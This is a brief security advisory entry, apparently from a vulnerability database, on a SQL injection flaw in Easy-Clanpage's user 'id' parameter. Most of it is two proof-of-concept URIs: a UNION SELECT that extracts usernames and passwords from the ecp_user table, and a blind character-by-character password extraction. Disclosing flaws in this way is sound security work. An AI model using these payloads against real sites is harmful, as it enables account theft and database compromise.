Easy-Clanpage User 'id' Parameter SQL Injection Vulnerability

Easy-Clanpage User 'id' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/[path]/?section=user&action=details&id=-1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*

http://www.example.com/ecp_version2/?section=user&action=details&func=stats&id=1+and+1=1+and+ascii(substring((SELECT password FROM ecp_user+WHERE+userID=1 LIMIT 0,1),1,1))>1

The following exploit is available:

/data/vulnerabilities/exploits/28329.py